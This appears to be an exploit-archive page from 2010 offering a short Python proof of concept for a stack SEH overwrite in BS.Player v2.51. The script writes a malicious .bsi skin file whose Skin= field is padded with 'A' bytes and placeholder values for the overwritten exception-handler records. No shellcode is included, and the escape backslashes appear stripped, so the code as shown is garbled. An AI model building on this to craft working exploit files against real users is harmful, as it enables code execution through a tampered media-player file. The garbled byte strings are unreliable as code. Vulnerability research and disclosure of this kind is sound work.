[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BS.Player v2.51 SEH Overwrite Vulnerability
# Published : 2010-01-15
# Author : Mert SARICA
# Previous Title : Rosoft Media Player 4.4.4 Buffer OverFlow Exploit (SEH)
# Next Title : Winamp 5.05-5.13 .ini local stack buffer overflow poc


# BS.Player v2.51
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# SEH Overwrite Vulnerability
# http://www.mertsarica.com

junk = "[Options]nSkin="

vulnerability = junk + "x41"*496 + "x42"*4 + "x43"*4

try: 
   vulnerable = open("vulnerable.bsi",'w') 
   vulnerable.write(vulnerability) 
   vulnerable.close() 
   print "Vulnerable file created!n"
except: 
   print "Error occured!"